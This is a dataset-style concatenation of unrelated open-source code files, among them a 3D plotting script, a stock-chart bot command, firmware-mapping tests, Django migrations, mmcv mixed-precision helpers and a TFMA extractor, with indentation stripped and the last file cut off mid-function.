from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib as mpl
import os
basedir = '.\\Images\\RotatingCube\\'
if os.name == 'posix':
basedir = 'Images/RotatingCube/'
def draw_cubic():
fn = lambda x,y: x**3+y**3
for i in range(20):
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
r = general_rotation(np.array([1,0,0]),np.pi/120*i)
#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0)
im.save(basedir + 'im' + str(i) + '.png')
def three_d_grid():
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)
R = (X**3 + Y**3)
Z = R
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
#ax.set_zlim(-1.01, 1.01)
#ax.zaxis.set_major_locator(LinearLocator(10))
#ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
theta = np.linspace(0, 2 * np.pi, 100)
for r in np.arange(0.1,1.0,0.1):
#r = 1.0
x = r * np.sin(theta)
y = r * np.cos(theta)
z = x**3+y**3
ax.plot(x, y, z, label='parametric curve')
#ax.legend()
plt.show()
def paraboloid_w_grad(im_ind=0, scale=200, shift=np.array([1000,1000,0]), opacity=60,
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0 * (8 + im_ind/3.0))
j=4
r = rotation(3, 2 * np.pi* j /30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0 * (im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
render_scene_4d_axis(draw, r1, 4, scale, shift)
# This is what draws the pink paraboloid.
for z in np.arange(0.001, 3.5, 0.02):
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,
rgba=(255,20,147,50))
xax1=np.array([-100.0,0,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([100.0,0,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
xax1=np.array([0.0,-100,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([0.0,100,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
#gradients(draw,r)
pt = shift
draw.ellipse((pt[0]-10, pt[1]-10, pt[0]+10, pt[1]+10), fill = (0,255,0))
draw_paraboloid_plane(draw,r,3.3)
draw_paraboloid_plane(draw,r,2.0,extent=1.4)
draw_paraboloid_plane(draw,r,1.0,extent=1.0)
im.save(basepath + 'im' + str(im_ind) + '.png')
def gradients(draw,r):
#for z in [0.3,1.3,2.3,3.3]:
for z in [3.3,2.0,1.0]:
x = np.sqrt(z)
for x in np.arange(-x,x,x/2):
y = np.sqrt(z-x*x)
arrowV1(draw,r,np.array([y,x,z]), np.array([1.5*y,1.5*x,z]), (204,102,255))
if z>3.0:
arrowV1(draw,r,np.array([-y,x,z]), np.array([-1.5*y,1.5*x,z]), (204,102,255))
def draw_paraboloid_plane(draw,r,z=3.3,scale=200,shift=np.array([1000,1000,0]),extent=2):
pt1=np.array([extent,extent,z]);pt1=np.dot(r,pt1)*scale+shift
pt2=np.array([extent,-extent,z]);pt2=np.dot(r,pt2)*scale+shift
pt3=np.array([-extent,-extent,z]);pt3=np.dot(r,pt3)*scale+shift
pt4=np.array([-extent,extent,z]);pt4=np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,scale=scale,
rgba=(255,20,10,100),width=10)
def plane_w_arrows(im_ind=0, scale=200,\
shift=np.array([824,824,0]),\
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0*(8 + im_ind/3.0))
j=4
r = rotation(3, 2*np.pi*j/30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0*(im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (1648, 1648), "black")
draw = ImageDraw.Draw(im, 'RGBA')
pt1 = 3*np.array([1.0,-1.0,0]); pt2 = 3*np.array([1.0,1.0,0])
z = 1.2**2+1
pt3 = 3*np.array([-1.0,1.0,0]); pt4 = 3*np.array([-1.0,-1.0,0])
pt1 = np.dot(r,pt1)*scale+shift; pt2 = np.dot(r,pt2)*scale+shift
pt3 = np.dot(r,pt3)*scale+shift; pt4 = np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
draw_arrows(draw,r,rgba=(255,250,47),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0, rgba=(73,200,250),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0+np.pi/3, rgba=(255,20,147),shift=shift)
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,2.5]), shift=shift,rgb=(20,200,25))
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,-2.5]), shift=shift,rgb=(255,20,25))
im.save(basepath + 'im' + str(im_ind) + '.png')
def draw_arrows(draw,r,rot_angl=np.pi/6.0,rgba=(255,20,147),shift=np.array([1000,1000,0])):
base = np.array([0,0,1.5])
for theta in np.arange(0,np.pi*2,2*np.pi/3):
a = np.array([np.cos(theta),np.sin(theta),0])
rr = general_rotation(a, rot_angl)
arrow1 = np.dot(rr,base)
arrowV1(draw,r,np.array([0,0,0]), arrow1, rgb=rgba,shift=shift)
rgba = rgba+(150,)
generalized_arc(draw, r, center=np.array([0,0,1.5*np.cos(rot_angl)]),
vec=np.array([0,0,1]),
point=1.5*np.array([0,np.sin(rot_angl),np.cos(rot_angl)]),
radius=100, prcnt=1.0,
rgba=rgba,shift=shift)
#####################
## Paraboloid with Lagrange visualized.
im = Image.new("RGB", (2048, 2048), (1, 1, 1))
draw = ImageDraw.Draw(im, 'RGBA')
scale=5.0; ind=0; sep = 24; i = 2.0; base_coeff = 0.02; start_line = -12.0
shift = np.array([1000.0, 1000.0, 0.0])
r1 = np.eye(4); j=24
r = rotation(3, np.pi/30*j)
r1[:3,:3] = r
render_scene_4d_axis(draw, r1, 4)
fn = lambda x, y : paraboloid(x, y, coeff=i*base_coeff, intercept=i)
drawFunctionalXYGrid(draw, r, scale=scale, fn=fn,
extent=60, rgba2=(255,20,147,80),
saperatingPlane=np.array([-1,-1,sep]))
three_d_parabola(draw, r, r2)
im.save(basedir + 'im' + str(0) + '.png')
|
bots/stocks/technical_analysis/adosc.py
|
tehcoderer/GamestonkTerminal
| 255 |
65025
|
import logging
import plotly.graph_objects as go
from bots import imps, load_candle
from openbb_terminal.common.technical_analysis import volume_model
from openbb_terminal.decorators import log_start_end
# pylint: disable=R0913
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def adosc_command(
ticker="",
interval: int = 15,
past_days: int = 0,
is_open: bool = False,
fast="3",
slow="10",
start="",
end="",
extended_hours: bool = False,
heikin_candles: bool = False,
trendline: bool = False,
news: bool = False,
):
"""Displays chart with chaikin oscillator [Yahoo Finance]"""
# Debug
if imps.DEBUG:
# pylint: disable=logging-too-many-args
logger.debug(
"ta adosc %s %s %s %s %s %s %s %s %s %s %s %s",
ticker,
interval,
past_days,
is_open,
fast,
slow,
start,
end,
extended_hours,
heikin_candles,
trendline,
news,
)
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if not fast.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
fast = int(fast)
if not slow.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
slow = int(slow)
# Retrieve Data
df_stock, start, end, bar_start = load_candle.stock_data(
ticker=ticker,
interval=interval,
past_days=past_days,
extended_hours=extended_hours,
start=start,
end=end,
heikin_candles=heikin_candles,
)
if df_stock.empty:
raise Exception("No Data Found")
df_ta = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = df_ta.join(volume_model.adosc(df_stock, is_open, fast, slow))
# Output Data
if interval != 1440:
df_ta = df_ta.loc[(df_ta.index >= bar_start) & (df_ta.index < end)]
df_ta = df_ta.fillna(0.0)
plot = load_candle.candle_fig(
df_ta,
ticker,
interval,
extended_hours,
news,
bar=bar_start,
int_bar=interval,
trendline=trendline,
rows=2,
cols=1,
shared_xaxes=True,
vertical_spacing=0.05,
row_width=[0.4, 0.7],
specs=[
[{"secondary_y": True}],
[{"secondary_y": False}],
],
)
title = f"<b>{plot['plt_title']} AD Oscillator</b>"
fig = plot["fig"]
fig.add_trace(
go.Scatter(
name="AD Osc [M]",
mode="lines",
x=df_ta.index,
y=df_ta.iloc[:, 6].values
if (not trendline) and (interval != 1440)
else df_ta.iloc[:, 11].values,
line=dict(width=2),
opacity=1,
),
row=2,
col=1,
)
fig.update_layout(
margin=dict(l=0, r=0, t=50, b=20),
template=imps.PLT_TA_STYLE_TEMPLATE,
colorway=imps.PLT_TA_COLORWAY,
title=title,
title_x=0.1,
title_font_size=14,
dragmode="pan",
)
imagefile = "ta_adosc.png"
# Check if interactive settings are enabled
plt_link = ""
if imps.INTERACTIVE:
plt_link = imps.inter_chart(fig, imagefile, callback=False)
imagefile = imps.image_border(imagefile, fig=fig)
return {
"title": f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}",
"description": plt_link,
"imagefile": imagefile,
}
|
test-framework/test-suites/integration/tests/list/test_list_host_firmware_mapping.py
|
anooprajendra/stacki
| 123 |
65026
|
<reponame>anooprajendra/stacki<gh_stars>100-1000
import json
import pytest
@pytest.mark.parametrize(
"hosts, expected_results",
(
(
"",
[
{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"},
{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"},
],
),
("backend-0-0", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("backend-0-1", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
),
)
def test_list_host_firmware_mapping_host_filter(
host,
add_host_with_net,
fake_local_firmware_file,
revert_firmware,
hosts,
expected_results,
):
"""Test that list host firmware mapping filters correctly based on provided arguments."""
# Add a backend-0-1
add_host_with_net(
hostname = "backend-0-1",
rack = 0,
rank = 1,
appliance = "backend",
interface = "eth0",
ip = "192.168.1.1",
network = "fake_net",
address = "192.168.1.0",
pxe = True,
)
# Add a piece of mellanox firmware to backend-0-0.
result = host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")
assert result.rc == 0
# Add a piece of dell firmware to backend-0-1
result = host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")
assert result.rc == 0
# List the firmware mappings
result = host.run(f"stack list host firmware mapping {hosts} output-format=json")
assert result.rc == 0
assert expected_results == json.loads(result.stdout)
@pytest.mark.parametrize(
"make, model, versions, expected_results",
(
(
"",
"",
"",
[
{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"},
{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"},
],
),
("mellanox", "", "", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("mellanox", "m7800", "", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("mellanox", "m7800", "1.2.3", [{"host": "backend-0-0", "version": "1.2.3", "make": "mellanox", "model": "m7800"}]),
("dell", "", "", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
("dell", "x1052-software", "", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
("dell", "x1052-software", "1.2.3.4", [{"host": "backend-0-1", "version": "1.2.3.4", "make": "dell", "model": "x1052-software"}]),
),
)
def test_list_host_firmware_mapping_non_host_filter(
host,
add_host_with_net,
fake_local_firmware_file,
revert_firmware,
make,
model,
versions,
expected_results,
):
"""Test that list host firmware mapping filters correctly based on provided arguments."""
# Add a backend-0-1
add_host_with_net(
hostname = "backend-0-1",
rack = 0,
rank = 1,
appliance = "backend",
interface = "eth0",
ip = "192.168.1.1",
network = "fake_net",
address = "192.168.1.0",
pxe = True,
)
# Add a piece of mellanox firmware to backend-0-0.
result = host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")
assert result.rc == 0
# Add a piece of dell firmware to backend-0-1
result = host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")
assert result.rc == 0
# List the firmware mappings
result = host.run(
f"stack list host firmware mapping {f'make={make}' if make else ''} {f'model={model}' if model else ''} "
f"{f'versions={versions}' if versions else ''} output-format=json"
)
assert result.rc == 0
assert expected_results == json.loads(result.stdout)
|
supervisor/discovery/validate.py
|
pnjongang/supervisor
| 597 |
65030
|
"""Validate services schema."""
from importlib import import_module
from pathlib import Path
import voluptuous as vol
from ..const import ATTR_ADDON, ATTR_CONFIG, ATTR_DISCOVERY, ATTR_SERVICE, ATTR_UUID
from ..utils.validate import schema_or
from ..validate import uuid_match
def valid_discovery_service(service):
"""Validate service name."""
service_file = Path(__file__).parent.joinpath(f"services/{service}.py")
if not service_file.exists():
raise vol.Invalid(f"Service {service} not found") from None
return service
def valid_discovery_config(service, config):
"""Validate service name."""
try:
service_mod = import_module(f".services.{service}", "supervisor.discovery")
except ImportError:
raise vol.Invalid(f"Service {service} not found") from None
return service_mod.SCHEMA(config)
SCHEMA_DISCOVERY = vol.Schema(
[
vol.Schema(
{
vol.Required(ATTR_UUID): uuid_match,
vol.Required(ATTR_ADDON): str,
vol.Required(ATTR_SERVICE): valid_discovery_service,
vol.Required(ATTR_CONFIG): vol.Maybe(dict),
},
extra=vol.REMOVE_EXTRA,
)
]
)
SCHEMA_DISCOVERY_CONFIG = vol.Schema(
{vol.Optional(ATTR_DISCOVERY, default=list): schema_or(SCHEMA_DISCOVERY)},
extra=vol.REMOVE_EXTRA,
)
|
modules/benchmarks/e2e_test.bzl
|
John-Cassidy/angular
| 95,154 |
65047
|
load("//tools:defaults.bzl", "protractor_web_test_suite")
"""
Macro that can be used to define a e2e test in `modules/benchmarks`. Targets created through
this macro differentiate from a "benchmark_test" as they will run on CI and do not run
with `@angular/benchpress`.
"""
def e2e_test(name, server, **kwargs):
protractor_web_test_suite(
name = name,
on_prepare = "@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js",
server = server,
**kwargs
)
|
tech_project/lib/python2.7/site-packages/filer/migrations/0005_auto_20160623_1425.py
|
priyamshah112/Project-Descripton-Blog
| 134 |
65049
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-23 18:25
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('filer', '0004_auto_20160328_1434'),
]
operations = [
migrations.AlterField(
model_name='file',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='owned_files', to=settings.AUTH_USER_MODEL, verbose_name='owner'),
),
migrations.AlterField(
model_name='folder',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='filer_owned_folders', to=settings.AUTH_USER_MODEL, verbose_name='owner'),
),
migrations.AlterField(
model_name='folderpermission',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='filer_folder_permissions', to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
]
|
mmcv/runner/fp16_utils.py
|
lyttonhao/mmcv
| 549 |
65054
|
<gh_stars>100-1000
import functools
from collections import OrderedDict, abc
from inspect import getfullargspec
import numpy as np
import torch
import torch.distributed as dist
import torch.nn as nn
from torch._utils import (_flatten_dense_tensors, _take_tensors,
_unflatten_dense_tensors)
def cast_tensor_type(inputs, src_type, dst_type):
"""Recursively convert Tensor in inputs from src_type to dst_type.
Args:
inputs: Inputs that to be casted.
src_type (torch.dtype): Source type..
dst_type (torch.dtype): Destination type.
Returns:
The same type with inputs, but all contained Tensors have been cast.
"""
if isinstance(inputs, torch.Tensor):
return inputs.to(dst_type)
elif isinstance(inputs, str):
return inputs
elif isinstance(inputs, np.ndarray):
return inputs
elif isinstance(inputs, abc.Mapping):
return type(inputs)({
k: cast_tensor_type(v, src_type, dst_type)
for k, v in inputs.items()
})
elif isinstance(inputs, abc.Iterable):
return type(inputs)(
cast_tensor_type(item, src_type, dst_type) for item in inputs)
else:
return inputs
def auto_fp16(apply_to=None, out_fp32=False):
"""Decorator to enable fp16 training automatically.
This decorator is useful when you write custom modules and want to support
mixed precision training. If inputs arguments are fp32 tensors, they will
be converted to fp16 automatically. Arguments other than fp32 tensors are
ignored.
Args:
apply_to (Iterable, optional): The argument names to be converted.
`None` indicates all arguments.
out_fp32 (bool): Whether to convert the output back to fp32.
Example:
>>> import torch.nn as nn
>>> class MyModule1(nn.Module):
>>>
>>> # Convert x and y to fp16
>>> @auto_fp16()
>>> def forward(self, x, y):
>>> pass
>>> import torch.nn as nn
>>> class MyModule2(nn.Module):
>>>
>>> # convert pred to fp16
>>> @auto_fp16(apply_to=('pred', ))
>>> def do_something(self, pred, others):
>>> pass
"""
def auto_fp16_wrapper(old_func):
@functools.wraps(old_func)
def new_func(*args, **kwargs):
# check if the module has set the attribute `fp16_enabled`, if not,
# just fallback to the original method.
if not isinstance(args[0], torch.nn.Module):
raise TypeError('@auto_fp16 can only be used to decorate the '
'method of nn.Module')
if not (hasattr(args[0], 'fp16_enabled') and args[0].fp16_enabled):
return old_func(*args, **kwargs)
# get the arg spec of the decorated method
args_info = getfullargspec(old_func)
# get the argument names to be casted
args_to_cast = args_info.args if apply_to is None else apply_to
# convert the args that need to be processed
new_args = []
# NOTE: default args are not taken into consideration
if args:
arg_names = args_info.args[:len(args)]
for i, arg_name in enumerate(arg_names):
if arg_name in args_to_cast:
new_args.append(
cast_tensor_type(args[i], torch.float, torch.half))
else:
new_args.append(args[i])
# convert the kwargs that need to be processed
new_kwargs = {}
if kwargs:
for arg_name, arg_value in kwargs.items():
if arg_name in args_to_cast:
new_kwargs[arg_name] = cast_tensor_type(
arg_value, torch.float, torch.half)
else:
new_kwargs[arg_name] = arg_value
# apply converted arguments to the decorated method
output = old_func(*new_args, **new_kwargs)
# cast the results back to fp32 if necessary
if out_fp32:
output = cast_tensor_type(output, torch.half, torch.float)
return output
return new_func
return auto_fp16_wrapper
def force_fp32(apply_to=None, out_fp16=False):
"""Decorator to convert input arguments to fp32 in force.
This decorator is useful when you write custom modules and want to support
mixed precision training. If there are some inputs that must be processed
in fp32 mode, then this decorator can handle it. If inputs arguments are
fp16 tensors, they will be converted to fp32 automatically. Arguments other
than fp16 tensors are ignored.
Args:
apply_to (Iterable, optional): The argument names to be converted.
`None` indicates all arguments.
out_fp16 (bool): Whether to convert the output back to fp16.
Example:
>>> import torch.nn as nn
>>> class MyModule1(nn.Module):
>>>
>>> # Convert x and y to fp32
>>> @force_fp32()
>>> def loss(self, x, y):
>>> pass
>>> import torch.nn as nn
>>> class MyModule2(nn.Module):
>>>
>>> # convert pred to fp32
>>> @force_fp32(apply_to=('pred', ))
>>> def post_process(self, pred, others):
>>> pass
"""
def force_fp32_wrapper(old_func):
@functools.wraps(old_func)
def new_func(*args, **kwargs):
# check if the module has set the attribute `fp16_enabled`, if not,
# just fallback to the original method.
if not isinstance(args[0], torch.nn.Module):
raise TypeError('@force_fp32 can only be used to decorate the '
'method of nn.Module')
if not (hasattr(args[0], 'fp16_enabled') and args[0].fp16_enabled):
return old_func(*args, **kwargs)
# get the arg spec of the decorated method
args_info = getfullargspec(old_func)
# get the argument names to be casted
args_to_cast = args_info.args if apply_to is None else apply_to
# convert the args that need to be processed
new_args = []
if args:
arg_names = args_info.args[:len(args)]
for i, arg_name in enumerate(arg_names):
if arg_name in args_to_cast:
new_args.append(
cast_tensor_type(args[i], torch.half, torch.float))
else:
new_args.append(args[i])
# convert the kwargs that need to be processed
new_kwargs = dict()
if kwargs:
for arg_name, arg_value in kwargs.items():
if arg_name in args_to_cast:
new_kwargs[arg_name] = cast_tensor_type(
arg_value, torch.half, torch.float)
else:
new_kwargs[arg_name] = arg_value
# apply converted arguments to the decorated method
output = old_func(*new_args, **new_kwargs)
# cast the results back to fp32 if necessary
if out_fp16:
output = cast_tensor_type(output, torch.float, torch.half)
return output
return new_func
return force_fp32_wrapper
def _allreduce_coalesced(tensors, world_size, bucket_size_mb=-1):
if bucket_size_mb > 0:
bucket_size_bytes = bucket_size_mb * 1024 * 1024
buckets = _take_tensors(tensors, bucket_size_bytes)
else:
buckets = OrderedDict()
for tensor in tensors:
tp = tensor.type()
if tp not in buckets:
buckets[tp] = []
buckets[tp].append(tensor)
buckets = buckets.values()
for bucket in buckets:
flat_tensors = _flatten_dense_tensors(bucket)
dist.all_reduce(flat_tensors)
flat_tensors.div_(world_size)
for tensor, synced in zip(
bucket, _unflatten_dense_tensors(flat_tensors, bucket)):
tensor.copy_(synced)
def allreduce_grads(params, coalesce=True, bucket_size_mb=-1):
"""Allreduce gradients.
Args:
params (list[torch.Parameters]): List of parameters of a model
coalesce (bool, optional): Whether allreduce parameters as a whole.
Defaults to True.
bucket_size_mb (int, optional): Size of bucket, the unit is MB.
Defaults to -1.
"""
grads = [
param.grad.data for param in params
if param.requires_grad and param.grad is not None
]
world_size = dist.get_world_size()
if coalesce:
_allreduce_coalesced(grads, world_size, bucket_size_mb)
else:
for tensor in grads:
dist.all_reduce(tensor.div_(world_size))
def wrap_fp16_model(model):
"""Wrap the FP32 model to FP16.
1. Convert FP32 model to FP16.
2. Remain some necessary layers to be FP32, e.g., normalization layers.
Args:
model (nn.Module): Model in FP32.
"""
# convert model to fp16
model.half()
# patch the normalization layers to make it work in fp32 mode
patch_norm_fp32(model)
# set `fp16_enabled` flag
for m in model.modules():
if hasattr(m, 'fp16_enabled'):
m.fp16_enabled = True
def patch_norm_fp32(module):
"""Recursively convert normalization layers from FP16 to FP32.
Args:
module (nn.Module): The modules to be converted in FP16.
Returns:
nn.Module: The converted module, the normalization layers have been
converted to FP32.
"""
if isinstance(module, (nn.modules.batchnorm._BatchNorm, nn.GroupNorm)):
module.float()
if isinstance(module, nn.GroupNorm) or torch.__version__ < '1.3':
module.forward = patch_forward_method(module.forward, torch.half,
torch.float)
for child in module.children():
patch_norm_fp32(child)
return module
def patch_forward_method(func, src_type, dst_type, convert_output=True):
"""Patch the forward method of a module.
Args:
func (callable): The original forward method.
src_type (torch.dtype): Type of input arguments to be converted from.
dst_type (torch.dtype): Type of input arguments to be converted to.
convert_output (bool): Whether to convert the output back to src_type.
Returns:
callable: The patched forward method.
"""
def new_forward(*args, **kwargs):
output = func(*cast_tensor_type(args, src_type, dst_type),
**cast_tensor_type(kwargs, src_type, dst_type))
if convert_output:
output = cast_tensor_type(output, dst_type, src_type)
return output
return new_forward
|
testcontainers/google/__init__.py
|
singerjess/testcontainers-python
| 465 |
65056
|
"""
Google Cloud Emulators
======================
Allows to spin up google cloud emulators, such as PubSub.
"""
from .pubsub import PubSubContainer # noqa
|
chrome/test/chromedriver/embed_mobile_devices_in_cpp.py
|
zipated/src
| 2,151 |
65057
|
<reponame>zipated/src
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Embeds standalone JavaScript snippets in C++ code.
The script requires the Source/devtools/front_end/emulated_devices/module.json
file from Blink that lists the known mobile devices to be passed in as the only
argument. The list of known devices will be written to a C-style string to be
parsed with JSONReader.
"""
import json
import optparse
import os
import re
import subprocess
import sys
import chrome_paths
import cpp_source
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--version-file', type='string',
default=os.path.join(chrome_paths.GetSrc(), 'chrome', 'VERSION'),
help='Path to Chrome version file')
parser.add_option(
'', '--directory', type='string', default='.',
help='Path to directory where the cc/h files should be created')
options, args = parser.parse_args()
# The device userAgent string may contain '%s', which should be replaced with
# current Chrome version. First we read the version file.
version_parts = ['MAJOR', 'MINOR', 'BUILD', 'PATCH']
version = []
version_file = open(options.version_file, 'r')
for part in version_parts:
# The version file should have 4 lines, with format like MAJOR=63
components = version_file.readline().split('=')
if len(components) != 2 or components[0].strip() != part:
print 'Bad version file'
return 1
version.append(components[1].strip())
# Join parts of version together using '.' as separator
version = '.'.join(version)
devices = {}
file_name = args[0]
inside_list = False
with open(file_name, 'r') as f:
emulated_devices = json.load(f)
extensions = emulated_devices['extensions']
for extension in extensions:
if extension['type'] == 'emulated-device':
device = extension['device']
title = device['title']
titles = [title]
# For 'iPhone 6/7/8', also add ['iPhone 6', 'iPhone 7', 'iPhone 8'] for
# backward compatibility.
if '/' in title:
words = title.split()
for i in range(len(words)):
if '/' in words[i]:
# Only support one word containing '/'
break
tokens = words[i].split('/')
for token in tokens:
words[i] = token
titles.append(' '.join(words))
for title in titles:
devices[title] = {
'userAgent': device['user-agent'].replace('%s', version),
'width': device['screen']['vertical']['width'],
'height': device['screen']['vertical']['height'],
'deviceScaleFactor': device['screen']['device-pixel-ratio'],
'touch': 'touch' in device['capabilities'],
'mobile': 'mobile' in device['capabilities'],
}
output_dir = 'chrome/test/chromedriver/chrome'
cpp_source.WriteSource('mobile_device_list',
output_dir,
options.directory,
{'kMobileDevices': json.dumps(devices)})
clang_format = ['clang-format', '-i']
subprocess.Popen(clang_format + ['%s/mobile_device_list.cc' % output_dir])
subprocess.Popen(clang_format + ['%s/mobile_device_list.h' % output_dir])
if __name__ == '__main__':
sys.exit(main())
|
chatette/parsing/lexing/rule_arg_decl.py
|
SimGus/Chatette
| 263 |
65063
|
<reponame>SimGus/Chatette
# coding: utf-8
"""
Module `chatette.parsing.lexing.rule_arg_decl`
Contains the definition of the class that represents the lexing rule
to tokenize the declaration of an argument in a unit declaration.
"""
from chatette.parsing.lexing.lexing_rule import LexingRule
from chatette.parsing.lexing import LexicalToken, TerminalType
from chatette.parsing.utils import ARG_SYM, extract_identifier
class RuleArgDecl(LexingRule):
def _apply_strategy(self, **kwargs):
if not self._text.startswith(ARG_SYM, self._next_index):
self.error_msg = \
"Invalid token. Expected an argument declaration there " + \
"(starting with '" + ARG_SYM + "')."
return False
self._next_index += 1
self._update_furthest_matched_index()
self._tokens.append(
LexicalToken(TerminalType.arg_marker, ARG_SYM)
)
arg_name = extract_identifier(self._text, self._next_index)
if arg_name is None:
self.error_msg = \
"Didn't expect the line to end there. Expected an argument name."
return False
elif len(arg_name) == 0:
self.error_msg = \
"Couldn't extract the argument name. Arguments must have a name."
return False
self._next_index += len(arg_name)
self._update_furthest_matched_index()
self._tokens.append(LexicalToken(TerminalType.arg_name, arg_name))
return True
|
ckanext/example_isignal/plugin.py
|
gg2/ckan
| 2,805 |
65074
|
# -*- coding: utf-8 -*-
import ckan.plugins as p
def x2(sender):
return sender * 2
def x10(sender):
return sender * 10
class ExampleISignalPlugin(p.SingletonPlugin):
p.implements(p.ISignal)
# ISignal
def get_signal_subscriptions(self):
return {
p.toolkit.signals.ckanext.signal(u'isignal_number'): [
x2,
{u'receiver': x10, u'sender': 10}
]
}
|
zenml/steps/evaluator/tfma_module.py
|
ramitsurana/zenml
| 1,275 |
65076
|
from typing import Dict, Optional, Text, List
import apache_beam as beam
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import model_util
from tensorflow_model_analysis import types
from tensorflow_model_analysis.extractors import extractor
from tfx_bsl.tfxio import tensor_adapter
BATCHED_PREDICT_EXTRACTOR_STAGE_NAME = 'ExtractBatchPredictions'
def custom_extractors(eval_config,
eval_shared_model,
tensor_adapter_config
) -> List[tfma.extractors.Extractor]:
return tfma.default_extractors(
eval_config=eval_config,
eval_shared_model=eval_shared_model,
tensor_adapter_config=tensor_adapter_config,
custom_predict_extractor=BatchedPredictExtractor(eval_config,
eval_shared_model,
tensor_adapter_config
))
def BatchedPredictExtractor(
eval_config: config.EvalConfig,
eval_shared_model: types.MaybeMultipleEvalSharedModels,
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> extractor.Extractor:
eval_shared_models = model_util.verify_and_update_eval_shared_models(
eval_shared_model)
return extractor.Extractor(
stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME,
ptransform=_ExtractBatchedPredictions(
eval_config=eval_config,
eval_shared_models={m.model_name: m for m in eval_shared_models},
tensor_adapter_config=tensor_adapter_config))
@beam.ptransform_fn
@beam.typehints.with_input_types(types.Extracts)
@beam.typehints.with_output_types(types.Extracts)
def _ExtractBatchedPredictions(
extracts: beam.pvalue.PCollection,
eval_config: config.EvalConfig,
eval_shared_models: Dict[Text, types.EvalSharedModel],
tensor_adapter_config: Optional[
